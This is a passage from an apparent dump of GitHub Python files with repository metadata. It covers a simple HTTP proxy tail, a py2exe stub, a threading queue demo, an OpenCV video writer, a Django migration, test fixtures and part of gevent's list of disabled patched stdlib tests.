# receive data from remote
received_data = b""
while 1:
data = s.recv(4096)
if not data:
break
received_data += data
s.close()
# send data to client
self.wfile.write(received_data)
def main():
try:
server = HTTPServer((HOST, PORT), ProxyHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
c5ecd02296aa16caffcde786d3ab77fae28405d1 | 28c598bf75f3ab287697c7f0ff1fb13bebb7cf75 | /build/bdist.win32/winexe/temp/OpenSSL.crypto.py | 6acfec583072680d7cf8126acf30df4957600e19 | [] | no_license | keaysma/solinia_depreciated | 4cb8811df4427261960af375cf749903d0ca6bd1 | 4c265449a5e9ca91f7acf7ac05cd9ff2949214ac | refs/heads/master | 2020-03-25T13:08:33.913231 | 2014-09-12T08:23:26 | 2014-09-12T08:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 343 | py |
def __load():
import imp, os, sys
try:
dirname = os.path.dirname(__loader__.archive)
except NameError:
dirname = sys.prefix
path = os.path.join(dirname, 'crypto.pyd')
#print "py2exe extension module", __name__, "->", path
mod = imp.load_dynamic(__name__, path)
## mod.frozen = 1
__load()
del __load
| [
"[email protected]"
] | |
16e0739edad97ed1235596b5089565cd8efa8f70 | 5b314502919bd7e12521ad126752d279912cd33d | /prodcons.py | d5e07a09cc1bdc3dcf283f36db18ea8f09ee3142 | [
"Apache-2.0"
] | permissive | xshi0001/base_function | 68576d484418b4cda8576f729d0b48a90d0258a1 | 77ed58289151084cc20bfc3328d3ca83e6a19366 | refs/heads/master | 2020-12-03T02:24:14.694973 | 2017-06-27T10:51:16 | 2017-06-27T10:51:16 | 95,935,169 | 1 | 0 | null | 2017-07-01T01:39:11 | 2017-07-01T01:39:11 | null | UTF-8 | Python | false | false | 1,533 | py | # -*-coding=utf-8
from Queue import Queue
from random import randint
from MyThread import MyThread
from time import sleep
def queue_test(q):
#q=Queue(10);
for i in range(10):
temp = randint(1, 10)
print temp
q.put("number:", temp)
print "size of queue is %d" % q.qsize()
def writeQ(q, i):
print "producter object for Q"
data = randint(1, 10)
#print "data is %d" %data
q.put(i, 1)
print "size now in producter is %d" % q.qsize()
def readQ(q):
print "consumer object for Q"
data = q.get(1)
print data
print "now after consume Q size is %d" % q.qsize()
def writer(q, loop):
for i in range(loop):
writeQ(q, i)
sleep_time = randint(1, 3)
sleep(sleep_time)
def reader(q, loop):
for i in range(loop):
readQ(q)
sleep_time = randint(2, 5)
sleep(sleep_time)
funcs = [writer, reader]
nfuncs = len(funcs)
def area_test(a):
a = a * 10
def main():
'''
a=2
print "a=%d" %a
area_test(a)
print "a now is a= %d" %a
q=Queue(10);
print "main q size %d" %q.qsize()
queue_test(q)
print "after function q size %d" %q.qsize()
'''
threads = []
q = Queue(10)
loop = 10
for i in range(nfuncs):
t = MyThread(funcs[i], (q, loop))
threads.append(t)
for i in range(nfuncs):
threads[i].start()
'''
for i in range(nfuncs):
threads[i].join()
'''
#print "end of main"
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
b4494671f38f7126a6d2398e2a96b7c336e7f55d | 2a34a824e1a2d3bac7b99edcf19926a477a157a0 | /src/cr/vision/io/videowriter.py | 7277eb9220a2e28a1d27d3f2748e3fc3a6ce7fee | [
"Apache-2.0"
] | permissive | carnotresearch/cr-vision | a7cb07157dbf470ed3fe560ef85d6e5194c660ae | 317fbf70c558e8f9563c3d0ba3bebbc5f84af622 | refs/heads/master | 2023-04-10T22:34:34.833043 | 2021-04-25T13:32:14 | 2021-04-25T13:32:14 | 142,256,002 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,323 | py | '''
Wrapper for OpenCV video writer
'''
import cv2
class VideoWriter:
'''Wrapper class for OpenCV video writer'''
def __init__(self, filepath, fourcc='XVID', fps=15, frame_size=(640, 480), is_color=True):
'''Constructor'''
self.filepath = filepath
if isinstance(fourcc, str):
fourcc = cv2.VideoWriter_fourcc(*fourcc)
elif isinstance(fourcc, int):
pass
else:
raise "Invalid fourcc code"
self.stream = cv2.VideoWriter(filepath, fourcc, fps, frame_size)
self.counter = 0
def write(self, frame):
'''Writes a frame to output file'''
self.stream.write(frame)
self.counter += 1
print(self.counter)
def is_open(self):
'''Returns if the stream is open for writing'''
if self.stream is None:
return False
return self.stream.isOpened()
def stop(self):
'''Stop serving more frames'''
if self.stream is None:
# nothing to do
return
self.stream.release()
self.stream = None
def __del__(self):
# Ensure cleanup
self.stop()
def __enter__(self):
return self
def __exit__(self):
self.stop()
def __call__(self, frame):
self.write(frame)
| [
"[email protected]"
] | |
a618bd2571db03d8262b8233c0af56287cb540db | 50dcaae873badd727e8416302a88f9c0bff0a438 | /bookstore/migrations/0002_auto_20170101_0049.py | d3e6f7c0947c25e5f8687afb88146674f49c0239 | [] | no_license | jattoabdul/albaitulilm | 4ae0dc857509012e8aa5d775cda64305de562251 | c5586edaed045fec925a6c0bb1be5e220cbd8d15 | refs/heads/master | 2021-01-13T00:00:01.397037 | 2017-02-12T23:32:42 | 2017-02-12T23:32:42 | 81,761,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 641 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-31 23:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bookstore', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='book',
options={'ordering': ['title'], 'verbose_name_plural': 'Books'},
),
migrations.AddField(
model_name='author',
name='image',
field=models.ImageField(blank=True, upload_to='authors', verbose_name="Author's Avatar"),
),
]
| [
"[email protected]"
] | |
00f65ca762f76f54444ea65692ecde4774dbdecc | d2c88caf05eed0c16db0f592bc876845232e1370 | /tccli/services/cr/__init__.py | 5c384eca0cc18a816ea88260a5faa51d5439a8be | [
"Apache-2.0"
] | permissive | jaschadub/tencentcloud-cli | f3549a2eea93a596b3ff50abf674ff56f708a3fc | 70f47d3c847b4c6197789853c73a50105abd0d35 | refs/heads/master | 2023-09-01T11:25:53.278666 | 2022-11-10T00:11:41 | 2022-11-10T00:11:41 | 179,168,651 | 0 | 0 | Apache-2.0 | 2022-11-11T06:35:51 | 2019-04-02T22:32:21 | Python | UTF-8 | Python | false | false | 83 | py | # -*- coding: utf-8 -*-
from tccli.services.cr.cr_client import action_caller
| [
"[email protected]"
] | |
fd5c1bace80b13e13c1a052dd0dcd6ce9afea215 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_340/ch4_2020_03_23_19_22_41_022512.py | 4f38805b970b740b4a241620cdc59197c4c64017 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | def idade(x):
x=int(input('digite sua idade'))
return idade
if (idade=<11):
print('crianca')
if (12<=idade<=17):
print('adolescente')
if (idade>=18):
print ('adulto') | [
"[email protected]"
] | |
e2db064b4c559a481a1ab0ba635a84b59bd259e2 | 3e19d4f20060e9818ad129a0813ee758eb4b99c6 | /conftest.py | 1b0f10a63a7f6eddd9bf25df6187cc5b35adee18 | [
"MIT"
] | permissive | ReyvanZA/bitfinex_ohlc_import | 07bf85f4de8b0be3dc6838e188160d2b4963f284 | 6d6d548187c52bcd7e7327f411fab515c83faef1 | refs/heads/master | 2020-08-11T14:22:15.832186 | 2019-10-31T17:51:21 | 2019-11-11T11:33:28 | 214,579,369 | 0 | 0 | MIT | 2019-11-11T11:33:29 | 2019-10-12T04:48:12 | null | UTF-8 | Python | false | false | 546 | py | import pytest
@pytest.fixture
def symbols_fixture():
# symbols for testing
return [
"btcusd",
"ltcbtc",
"ethusd"
]
def candles_fixture():
return [[
1518272040000,
8791,
8782.1,
8795.8,
8775.8,
20.01209543
],
[
1518271980000,
8768,
8790.7,
8791,
8768,
38.41333393
],
[
1518271920000,
8757.3,
8768,
8770.6396831,
8757.3,
20.92449167
]]
| [
"[email protected]"
] | |
3943484a0d61c50b4405bc497457b811c4b22f96 | 8adead984d1e2fd4f36ae4088a0363597fbca8a3 | /venv/lib/python3.7/site-packages/gevent/testing/patched_tests_setup.py | 3fdef75043869db42b012f8ad15407c4d116d9e0 | [] | no_license | ravisjoshi/python_snippets | 2590650c673763d46c16c9f9b8908997530070d6 | f37ed822b5863a5a11b09550dd32a73d68e7070b | refs/heads/master | 2022-11-05T03:48:10.842858 | 2020-06-14T09:19:46 | 2020-06-14T09:19:46 | 256,961,137 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 59,511 | py | # pylint:disable=missing-docstring,invalid-name,too-many-lines
from __future__ import print_function, absolute_import, division
import collections
import contextlib
import functools
import sys
import os
# At least on 3.6+, importing platform
# imports subprocess, which imports selectors. That
# can expose issues with monkey patching. We don't need it
# though.
# import platform
import re
from .sysinfo import RUNNING_ON_APPVEYOR as APPVEYOR
from .sysinfo import RUNNING_ON_TRAVIS as TRAVIS
from .sysinfo import RESOLVER_NOT_SYSTEM as ARES
from .sysinfo import RUN_COVERAGE
from .sysinfo import PYPY
from .sysinfo import PYPY3
from .sysinfo import PY3
from .sysinfo import PY2
from .sysinfo import PY35
from .sysinfo import PY36
from .sysinfo import PY37
from .sysinfo import PY38
from .sysinfo import WIN
from .sysinfo import OSX
from .sysinfo import LIBUV
from .sysinfo import CFFI_BACKEND
from . import flaky
CPYTHON = not PYPY
# By default, test cases are expected to switch and emit warnings if there was none
# If a test is found in this list, it's expected not to switch.
no_switch_tests = '''test_patched_select.SelectTestCase.test_error_conditions
test_patched_ftplib.*.test_all_errors
test_patched_ftplib.*.test_getwelcome
test_patched_ftplib.*.test_sanitize
test_patched_ftplib.*.test_set_pasv
#test_patched_ftplib.TestIPv6Environment.test_af
test_patched_socket.TestExceptions.testExceptionTree
test_patched_socket.Urllib2FileobjectTest.testClose
test_patched_socket.TestLinuxAbstractNamespace.testLinuxAbstractNamespace
test_patched_socket.TestLinuxAbstractNamespace.testMaxName
test_patched_socket.TestLinuxAbstractNamespace.testNameOverflow
test_patched_socket.FileObjectInterruptedTestCase.*
test_patched_urllib.*
test_patched_asyncore.HelperFunctionTests.*
test_patched_httplib.BasicTest.*
test_patched_httplib.HTTPSTimeoutTest.test_attributes
test_patched_httplib.HeaderTests.*
test_patched_httplib.OfflineTest.*
test_patched_httplib.HTTPSTimeoutTest.test_host_port
test_patched_httplib.SourceAddressTest.testHTTPSConnectionSourceAddress
test_patched_select.SelectTestCase.test_error_conditions
test_patched_smtplib.NonConnectingTests.*
test_patched_urllib2net.OtherNetworkTests.*
test_patched_wsgiref.*
test_patched_subprocess.HelperFunctionTests.*
'''
ignore_switch_tests = '''
test_patched_socket.GeneralModuleTests.*
test_patched_httpservers.BaseHTTPRequestHandlerTestCase.*
test_patched_queue.*
test_patched_signal.SiginterruptTest.*
test_patched_urllib2.*
test_patched_ssl.*
test_patched_signal.BasicSignalTests.*
test_patched_threading_local.*
test_patched_threading.*
'''
def make_re(tests):
tests = [x.strip().replace(r'\.', r'\\.').replace('*', '.*?')
for x in tests.split('\n') if x.strip()]
return re.compile('^%s$' % '|'.join(tests))
no_switch_tests = make_re(no_switch_tests)
ignore_switch_tests = make_re(ignore_switch_tests)
def get_switch_expected(fullname):
"""
>>> get_switch_expected('test_patched_select.SelectTestCase.test_error_conditions')
False
>>> get_switch_expected('test_patched_socket.GeneralModuleTests.testCrucialConstants')
False
>>> get_switch_expected('test_patched_socket.SomeOtherTest.testHello')
True
>>> get_switch_expected("test_patched_httplib.BasicTest.test_bad_status_repr")
False
"""
# certain pylint versions mistype the globals as
# str, not re.
# pylint:disable=no-member
if ignore_switch_tests.match(fullname) is not None:
return None
if no_switch_tests.match(fullname) is not None:
return False
return True
disabled_tests = [
# The server side takes awhile to shut down
'test_httplib.HTTPSTest.test_local_bad_hostname',
# These were previously 3.5+ issues (same as above)
# but have been backported.
'test_httplib.HTTPSTest.test_local_good_hostname',
'test_httplib.HTTPSTest.test_local_unknown_cert',
'test_threading.ThreadTests.test_PyThreadState_SetAsyncExc',
# uses some internal C API of threads not available when threads are emulated with greenlets
'test_threading.ThreadTests.test_join_nondaemon_on_shutdown',
# asserts that repr(sleep) is '<built-in function sleep>'
'test_urllib2net.TimeoutTest.test_ftp_no_timeout',
'test_urllib2net.TimeoutTest.test_ftp_timeout',
'test_urllib2net.TimeoutTest.test_http_no_timeout',
'test_urllib2net.TimeoutTest.test_http_timeout',
# accesses _sock.gettimeout() which is always in non-blocking mode
'test_urllib2net.OtherNetworkTests.test_ftp',
# too slow
'test_urllib2net.OtherNetworkTests.test_urlwithfrag',
# fails dues to some changes on python.org
'test_urllib2net.OtherNetworkTests.test_sites_no_connection_close',
# flaky
'test_socket.UDPTimeoutTest.testUDPTimeout',
# has a bug which makes it fail with error: (107, 'Transport endpoint is not connected')
# (it creates a TCP socket, not UDP)
'test_socket.GeneralModuleTests.testRefCountGetNameInfo',
# fails with "socket.getnameinfo loses a reference" while the reference is only "lost"
# because it is referenced by the traceback - any Python function would lose a reference like that.
# the original getnameinfo does not "lose" it because it's in C.
'test_socket.NetworkConnectionNoServer.test_create_connection_timeout',
# replaces socket.socket with MockSocket and then calls create_connection.
# this unfortunately does not work with monkey patching, because gevent.socket.create_connection
# is bound to gevent.socket.socket and updating socket.socket does not affect it.
# this issues also manifests itself when not monkey patching DNS: http://code.google.com/p/gevent/issues/detail?id=54
# create_connection still uses gevent.socket.getaddrinfo while it should be using socket.getaddrinfo
'test_asyncore.BaseTestAPI.test_handle_expt',
# sends some OOB data and expect it to be detected as such; gevent.select.select does not support that
# This one likes to check its own filename, but we rewrite
# the file to a temp location during patching.
'test_asyncore.HelperFunctionTests.test_compact_traceback',
# expects time.sleep() to return prematurely in case of a signal;
# gevent.sleep() is better than that and does not get interrupted
# (unless signal handler raises an error)
'test_signal.WakeupSignalTests.test_wakeup_fd_early',
# expects select.select() to raise select.error(EINTR'interrupted
# system call') gevent.select.select() does not get interrupted
# (unless signal handler raises an error) maybe it should?
'test_signal.WakeupSignalTests.test_wakeup_fd_during',
'test_signal.SiginterruptTest.test_without_siginterrupt',
'test_signal.SiginterruptTest.test_siginterrupt_on',
# these rely on os.read raising EINTR which never happens with gevent.os.read
'test_subprocess.ProcessTestCase.test_leak_fast_process_del_killed',
'test_subprocess.ProcessTestCase.test_zombie_fast_process_del',
# relies on subprocess._active which we don't use
# Very slow, tries to open lots and lots of subprocess and files,
# tends to timeout on CI.
'test_subprocess.ProcessTestCase.test_no_leaking',
# This test is also very slow, and has been timing out on Travis
# since November of 2016 on Python 3, but now also seen on Python 2/Pypy.
'test_subprocess.ProcessTestCase.test_leaking_fds_on_error',
# Added between 3.6.0 and 3.6.3, uses _testcapi and internals
# of the subprocess module. Backported to Python 2.7.16.
'test_subprocess.POSIXProcessTestCase.test_stopped',
'test_ssl.ThreadedTests.test_default_ciphers',
'test_ssl.ThreadedTests.test_empty_cert',
'test_ssl.ThreadedTests.test_malformed_cert',
'test_ssl.ThreadedTests.test_malformed_key',
'test_ssl.NetworkedTests.test_non_blocking_connect_ex',
# XXX needs investigating
'test_ssl.NetworkedTests.test_algorithms',
# The host this wants to use, sha256.tbs-internet.com, is not resolvable
# right now (2015-10-10), and we need to get Windows wheels
# This started timing out randomly on Travis in oct/nov 2018. It appears
# to be something with random number generation taking too long.
'test_ssl.BasicSocketTests.test_random_fork',
# Relies on the repr of objects (Py3)
'test_ssl.BasicSocketTests.test_dealloc_warn',
'test_urllib2.HandlerTests.test_cookie_redirect',
# this uses cookielib which we don't care about
'test_thread.ThreadRunningTests.test__count',
'test_thread.TestForkInThread.test_forkinthread',
# XXX needs investigating
'test_subprocess.POSIXProcessTestCase.test_preexec_errpipe_does_not_double_close_pipes',
# Does not exist in the test suite until 2.7.4+. Subclasses Popen, and overrides
# _execute_child. But our version has a different parameter list than the
# version that comes with PyPy/CPython, so fails with a TypeError.
# This one crashes the interpreter if it has a bug parsing the
# invalid data.
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2019_5010',
# We had to copy in a newer version of the test file for SSL fixes
# and this doesn't work reliably on all versions.
'test_httplib.HeaderTests.test_headers_debuglevel',
# These depend on the exact error message produced by the interpreter
# when too many arguments are passed to functions. We can't match
# the exact signatures (because Python 2 doesn't support the syntax)
'test_context.ContextTest.test_context_new_1',
'test_context.ContextTest.test_context_var_new_1',
]
if 'thread' in os.getenv('GEVENT_FILE', ''):
disabled_tests += [
'test_subprocess.ProcessTestCase.test_double_close_on_error'
# Fails with "OSError: 9 invalid file descriptor"; expect GC/lifetime issues
]
if PY2 and PYPY:
disabled_tests += [
# These appear to hang or take a long time for some reason?
# Likely a hostname/binding issue or failure to properly close/gc sockets.
'test_httpservers.BaseHTTPServerTestCase.test_head_via_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_head_keep_alive',
'test_httpservers.BaseHTTPServerTestCase.test_send_blank',
'test_httpservers.BaseHTTPServerTestCase.test_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_command',
'test_httpservers.BaseHTTPServerTestCase.test_handler',
'test_httpservers.CGIHTTPServerTestcase.test_post',
'test_httpservers.CGIHTTPServerTestCase.test_query_with_continuous_slashes',
'test_httpservers.CGIHTTPServerTestCase.test_query_with_multiple_question_mark',
'test_httpservers.CGIHTTPServerTestCase.test_os_environ_is_not_altered',
# This one sometimes results on connection refused
'test_urllib2_localnet.TestUrlopen.test_info',
# Sometimes hangs
'test_ssl.ThreadedTests.test_socketserver',
# We had to update 'CERTFILE' to continue working, but
# this test hasn't been updated yet (the CPython tests
# are also too new to run on PyPy).
'test_ssl.BasicSocketTests.test_parse_cert',
]
if LIBUV:
# epoll appears to work with these just fine in some cases;
# kqueue (at least on OS X, the only tested kqueue system)
# never does (failing with abort())
# (epoll on Raspbian 8.0/Debian Jessie/Linux 4.1.20 works;
# on a VirtualBox image of Ubuntu 15.10/Linux 4.2.0 both tests fail;
# Travis CI Ubuntu 12.04 precise/Linux 3.13 causes one of these tests to hang forever)
# XXX: Retry this with libuv 1.12+
disabled_tests += [
# A 2.7 test. Tries to fork, and libuv cannot fork
'test_signal.InterProcessSignalTests.test_main',
# Likewise, a forking problem
'test_signal.SiginterruptTest.test_siginterrupt_off',
]
if PY2:
if TRAVIS:
if CPYTHON:
disabled_tests += [
# This appears to crash the process, for some reason,
# but only on CPython 2.7.14 on Travis. Cannot reproduce in
# 2.7.14 on macOS or 2.7.12 in local Ubuntu 16.04
'test_subprocess.POSIXProcessTestCase.test_close_fd_0',
'test_subprocess.POSIXProcessTestCase.test_close_fds_0_1',
'test_subprocess.POSIXProcessTestCase.test_close_fds_0_2',
]
if PYPY:
disabled_tests += [
# This seems to crash the interpreter. I cannot reproduce
# on macOS or local Linux VM.
# See https://travis-ci.org/gevent/gevent/jobs/348661604#L709
'test_smtplib.TooLongLineTests.testLineTooLong',
]
if ARES:
disabled_tests += [
# This can timeout with a socket timeout in ssl.wrap_socket(c)
# on Travis. I can't reproduce locally.
'test_ssl.ThreadedTests.test_handshake_timeout',
]
if PY3:
disabled_tests += [
# This test wants to pass an arbitrary fileno
# to a socket and do things with it. libuv doesn't like this,
# it raises EPERM. It is disabled on windows already.
# It depends on whether we had a fd already open and multiplexed with
'test_socket.GeneralModuleTests.test_unknown_socket_family_repr',
# And yes, there's a typo in some versions.
'test_socket.GeneralModuleTests.test_uknown_socket_family_repr',
]
if PY37:
disabled_tests += [
# This test sometimes fails at line 358. It's apparently
# extremely sensitive to timing.
'test_selectors.PollSelectorTestCase.test_timeout',
]
if OSX:
disabled_tests += [
# XXX: Starting when we upgraded from libuv 1.18.0
# to 1.19.2, this sometimes (usually) started having
# a series of calls ('select.poll(0)', 'select.poll(-1)')
# take longer than the allowed 0.5 seconds. Debugging showed that
# it was the second call that took longer, for no apparent reason.
# There doesn't seem to be a change in the source code to libuv that
# would affect this.
# XXX-XXX: This actually disables too many tests :(
'test_selectors.PollSelectorTestCase.test_timeout',
]
if RUN_COVERAGE:
disabled_tests += [
# Starting with #1145 this test (actually
# TestTLS_FTPClassMixin) becomes sensitive to timings
# under coverage.
'test_ftplib.TestFTPClass.test_storlines',
]
if sys.platform.startswith('linux'):
disabled_tests += [
# crashes with EPERM, which aborts the epoll loop, even
# though it was allowed in in the first place.
'test_asyncore.FileWrapperTest.test_dispatcher',
]
if WIN and PY2:
# From PyPy2-v5.9.0 and CPython 2.7.14, using its version of tests,
# which do work on darwin (and possibly linux?)
# I can't produce them in a local VM running Windows 10
# and the same pypy version.
disabled_tests += [
# These, which use asyncore, fail with
# 'NoneType is not iterable' on 'conn, addr = self.accept()'
# That returns None when the underlying socket raises
# EWOULDBLOCK, which it will do because it's set to non-blocking
# both by gevent and by libuv (at the level below python's knowledge)
# I can *usually* reproduce these locally; it seems to be some sort
# of race condition.
'test_ftplib.TestFTPClass.test_acct',
'test_ftplib.TestFTPClass.test_all_errors',
'test_ftplib.TestFTPClass.test_cwd',
'test_ftplib.TestFTPClass.test_delete',
'test_ftplib.TestFTPClass.test_dir',
'test_ftplib.TestFTPClass.test_exceptions',
'test_ftplib.TestFTPClass.test_getwelcome',
'test_ftplib.TestFTPClass.test_line_too_long',
'test_ftplib.TestFTPClass.test_login',
'test_ftplib.TestFTPClass.test_makepasv',
'test_ftplib.TestFTPClass.test_mkd',
'test_ftplib.TestFTPClass.test_nlst',
'test_ftplib.TestFTPClass.test_pwd',
'test_ftplib.TestFTPClass.test_quit',
'test_ftplib.TestFTPClass.test_makepasv',
'test_ftplib.TestFTPClass.test_rename',
'test_ftplib.TestFTPClass.test_retrbinary',
'test_ftplib.TestFTPClass.test_retrbinary_rest',
'test_ftplib.TestFTPClass.test_retrlines',
'test_ftplib.TestFTPClass.test_retrlines_too_long',
'test_ftplib.TestFTPClass.test_rmd',
'test_ftplib.TestFTPClass.test_sanitize',
'test_ftplib.TestFTPClass.test_set_pasv',
'test_ftplib.TestFTPClass.test_size',
'test_ftplib.TestFTPClass.test_storbinary',
'test_ftplib.TestFTPClass.test_storbinary_rest',
'test_ftplib.TestFTPClass.test_storlines',
'test_ftplib.TestFTPClass.test_storlines_too_long',
'test_ftplib.TestFTPClass.test_voidcmd',
'test_ftplib.TestTLS_FTPClass.test_data_connection',
'test_ftplib.TestTLS_FTPClass.test_control_connection',
'test_ftplib.TestTLS_FTPClass.test_context',
'test_ftplib.TestTLS_FTPClass.test_check_hostname',
'test_ftplib.TestTLS_FTPClass.test_auth_ssl',
'test_ftplib.TestTLS_FTPClass.test_auth_issued_twice',
# This one times out, but it's still a non-blocking socket
'test_ftplib.TestFTPClass.test_makeport',
# A timeout, possibly because of the way we handle interrupts?
'test_socketserver.SocketServerTest.test_InterruptedServerSelectCall',
'test_socketserver.SocketServerTest.test_InterruptServerSelectCall',
# times out with something about threading?
# The apparent hang is just after the print of "waiting for server"
'test_socketserver.SocketServerTest.test_ThreadingTCPServer',
'test_socketserver.SocketServerTest.test_ThreadingUDPServer',
'test_socketserver.SocketServerTest.test_TCPServer',
'test_socketserver.SocketServerTest.test_UDPServer',
# This one might be like 'test_urllib2_localnet.TestUrlopen.test_https_with_cafile'?
# XXX: Look at newer pypy and verify our usage of drop/reuse matches
# theirs.
'test_httpservers.BaseHTTPServerTestCase.test_command',
'test_httpservers.BaseHTTPServerTestCase.test_handler',
'test_httpservers.BaseHTTPServerTestCase.test_head_keep_alive',
'test_httpservers.BaseHTTPServerTestCase.test_head_via_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_header_close',
'test_httpservers.BaseHTTPServerTestCase.test_internal_key_error',
'test_httpservers.BaseHTTPServerTestCase.test_request_line_trimming',
'test_httpservers.BaseHTTPServerTestCase.test_return_custom_status',
'test_httpservers.BaseHTTPServerTestCase.test_send_blank',
'test_httpservers.BaseHTTPServerTestCase.test_send_error',
'test_httpservers.BaseHTTPServerTestCase.test_version_bogus',
'test_httpservers.BaseHTTPServerTestCase.test_version_digits',
'test_httpservers.BaseHTTPServerTestCase.test_version_invalid',
'test_httpservers.BaseHTTPServerTestCase.test_version_none',
'test_httpservers.SimpleHTTPServerTestCase.test_get',
'test_httpservers.SimpleHTTPServerTestCase.test_head',
'test_httpservers.SimpleHTTPServerTestCase.test_invalid_requests',
'test_httpservers.SimpleHTTPServerTestCase.test_path_without_leading_slash',
'test_httpservers.CGIHTTPServerTestCase.test_invaliduri',
'test_httpservers.CGIHTTPServerTestCase.test_issue19435',
# Unexpected timeouts sometimes
'test_smtplib.TooLongLineTests.testLineTooLong',
'test_smtplib.GeneralTests.testTimeoutValue',
# This sometimes crashes, which can't be our fault?
'test_ssl.BasicSocketTests.test_parse_cert_CVE_2019_5010',
]
if PYPY:
disabled_tests += [
# appears to timeout?
'test_threading.ThreadTests.test_finalize_with_trace',
'test_asyncore.DispatcherWithSendTests_UsePoll.test_send',
'test_asyncore.DispatcherWithSendTests.test_send',
# More unexpected timeouts
'test_ssl.ContextTests.test__https_verify_envvar',
'test_subprocess.ProcessTestCase.test_check_output',
'test_telnetlib.ReadTests.test_read_eager_A',
# But on Windows, our gc fix for that doesn't work anyway
# so we have to disable it.
'test_urllib2_localnet.TestUrlopen.test_https_with_cafile',
# These tests hang. see above.
'test_threading.ThreadJoinOnShutdown.test_1_join_on_shutdown',
'test_threading.ThreadingExceptionTests.test_print_exception',
# Our copy of these in test__subprocess.py also hangs.
# Anything that uses Popen.communicate or directly uses
# Popen.stdXXX.read hangs. It's not clear why.
'test_subprocess.ProcessTestCase.test_communicate',
'test_subprocess.ProcessTestCase.test_cwd',
'test_subprocess.ProcessTestCase.test_env',
'test_subprocess.ProcessTestCase.test_stderr_pipe',
'test_subprocess.ProcessTestCase.test_stdout_pipe',
'test_subprocess.ProcessTestCase.test_stdout_stderr_pipe',
'test_subprocess.ProcessTestCase.test_stderr_redirect_with_no_stdout_redirect',
'test_subprocess.ProcessTestCase.test_stdout_filedes_of_stdout',
'test_subprocess.ProcessTestcase.test_stdout_none',
'test_subprocess.ProcessTestcase.test_universal_newlines',
'test_subprocess.ProcessTestcase.test_writes_before_communicate',
'test_subprocess.Win32ProcessTestCase._kill_process',
'test_subprocess.Win32ProcessTestCase._kill_dead_process',
'test_subprocess.Win32ProcessTestCase.test_shell_sequence',
'test_subprocess.Win32ProcessTestCase.test_shell_string',
'test_subprocess.CommandsWithSpaces.with_spaces',
]
if WIN:
disabled_tests += [
# This test winds up hanging a long time.
# Inserting GCs doesn't fix it.
'test_ssl.ThreadedTests.test_handshake_timeout',
# These sometimes raise LoopExit, for no apparent reason,
# mostly but not exclusively on Python 2. Sometimes (often?)
# this happens in the setUp() method when we attempt to get a client
# connection
'test_socket.BufferIOTest.testRecvFromIntoBytearray',
'test_socket.BufferIOTest.testRecvFromIntoArray',
'test_socket.BufferIOTest.testRecvIntoArray',
'test_socket.BufferIOTest.testRecvIntoMemoryview',
'test_socket.BufferIOTest.testRecvFromIntoEmptyBuffer',
'test_socket.BufferIOTest.testRecvFromIntoMemoryview',
'test_socket.BufferIOTest.testRecvFromIntoSmallBuffer',
'test_socket.BufferIOTest.testRecvIntoBytearray',
]
if PY3:
disabled_tests += [
]
if APPVEYOR:
disabled_tests += [
]
if PYPY:
if TRAVIS:
disabled_tests += [
# This sometimes causes a segfault for no apparent reason.
# See https://travis-ci.org/gevent/gevent/jobs/327328704
# Can't reproduce locally.
'test_subprocess.ProcessTestCase.test_universal_newlines_communicate',
]
if RUN_COVERAGE and CFFI_BACKEND:
disabled_tests += [
# This test hangs in this combo for some reason
'test_socket.GeneralModuleTests.test_sendall_interrupted',
# This can get a timeout exception instead of the Alarm
'test_socket.TCPTimeoutTest.testInterruptedTimeout',
# This test sometimes gets the wrong answer (due to changed timing?)
'test_socketserver.SocketServerTest.test_ForkingUDPServer',
# Timing and signals are off, so a handler exception doesn't get raised.
# Seen under libev
'test_signal.InterProcessSignalTests.test_main',
]
if PY2:
if TRAVIS:
disabled_tests += [
# When we moved to group:travis_latest and dist:xenial,
# this started returning a value (33554432L) != 0; presumably
# because of updated SSL library? Only on CPython.
'test_ssl.ContextTests.test_options',
# When we moved to group:travis_latest and dist:xenial,
# one of the values used started *working* when it was expected to fail.
# The list of values and systems is long and complex, so
# presumably something needs to be updated. Only on PyPy.
'test_ssl.ThreadedTests.test_alpn_protocols',
]
disabled_tests += [
# At least on OSX, this results in connection refused
'test_urllib2_localnet.TestUrlopen.test_https_sni',
]
if sys.version_info[:3] < (2, 7, 16):
# We have 2.7.16 tests; older versions can fail
# to validate some SSL things or are missing important support functions
disabled_tests += [
# Support functions
'test_thread.ThreadRunningTests.test_nt_and_posix_stack_size',
'test_thread.ThreadRunningTests.test_save_exception_state_on_error',
'test_thread.ThreadRunningTests.test_starting_threads',
'test_thread.BarrierTest.test_barrier',
# Broken SSL
'test_urllib2_localnet.TestUrlopen.test_https',
'test_ssl.ContextTests.test__create_stdlib_context',
'test_ssl.ContextTests.test_create_default_context',
'test_ssl.ContextTests.test_options',
]
if PYPY and sys.pypy_version_info[:3] == (7, 3, 0): # pylint:disable=no-member
if OSX:
disabled_tests += [
# This is expected to produce an SSLError, but instead it appears to
# actually work. See above for when it started failing the same on
# Travis.
'test_ssl.ThreadedTests.test_alpn_protocols',
# This fails, presumably due to the OpenSSL it's compiled with.
'test_ssl.ThreadedTests.test_default_ecdh_curve',
]
def _make_run_with_original(mod_name, func_name):
@contextlib.contextmanager
def with_orig():
mod = __import__(mod_name)
now = getattr(mod, func_name)
from gevent.monkey import get_original
orig = get_original(mod_name, func_name)
try:
setattr(mod, func_name, orig)
yield
finally:
setattr(mod, func_name, now)
